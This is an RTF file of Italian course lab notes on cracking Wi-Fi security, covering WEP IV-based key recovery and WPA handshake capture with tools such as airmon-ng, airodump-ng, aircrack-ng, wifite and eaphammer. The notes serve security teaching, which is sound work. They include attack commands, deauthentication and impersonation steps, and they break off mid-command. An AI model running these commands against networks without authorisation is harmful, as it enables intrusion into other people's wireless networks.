{\rtf1\ansi\ansicpg1252\cocoartf1504\cocoasubrtf840
{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww6320\viewh18000\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\b\fs24 \cf0 NS\
\
LABORATORIA CRACK_WEP\
\

\b0 Prima di avviare il laboratorio bisogna far partire il modulo:\
radios=4 \'97> 4 interfacce di rete virtuali\
\
airmon-ng start wlan1 \'97> serve per far partire il monitoraggio sulla rete wlan1\
\
airodump-ng wlan1mon -w p.cap (-w vuol dire write nel file p.cap)\
\
WEP usa chiavi di 64 o 128 bit, di cui per\'f2 24 bit sono sicuramente dell\'92IV. E allora ascoltando il traffico e determinando un numero di IV abbastanza elevato (maggiore di 50 mila se le chiavi sono di 64 bit) \'e8 possibile cracckare la password;\
\
Per fare il crack si usa aircrack-ng p.cap.\
\
\

\b CRACK WPA-WPA2-CCMP\
\

\b0 In questo caso l\'92attacco si complica perch\'e8 l\'92unico modo che si ha per fare cracking \'e8 attendere che una stazione si connetta, e facendo passive attack si facendo il 4 way handshaking fatto col protocollo EAP e compiere un attacco a dizionario (con john the ripper per esempio) per determinare la chiave.\
\
airreplay permette di fare il replay dei pacchetti che sono stati in precedenza letti.\
\
Con l\'92opzione di aircrack - - channel posso definire il canale;\
- - deauth -c MAC -a AP posso fare impersonation.\
\
\
\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\
\
TOOL AUTOMATICO\
\
asciinema rec\
\
wifite - -kill - - wep - -no-wps\
trova automaticamente le reti e permette di attaccare  in maniera automatica.\
\
Attacco a wi fi unina.\
eaphammer \'e8 un programma che permette di generare in automatico tutto ci\'f2 che serve per crack (tutto ci\'f2 che abbiamo visto nel caso precedente).\
\
sudo ./eaphammer -i wlan0 - -channel 4 - - auth wpa -auth wpa-eap - - eassid}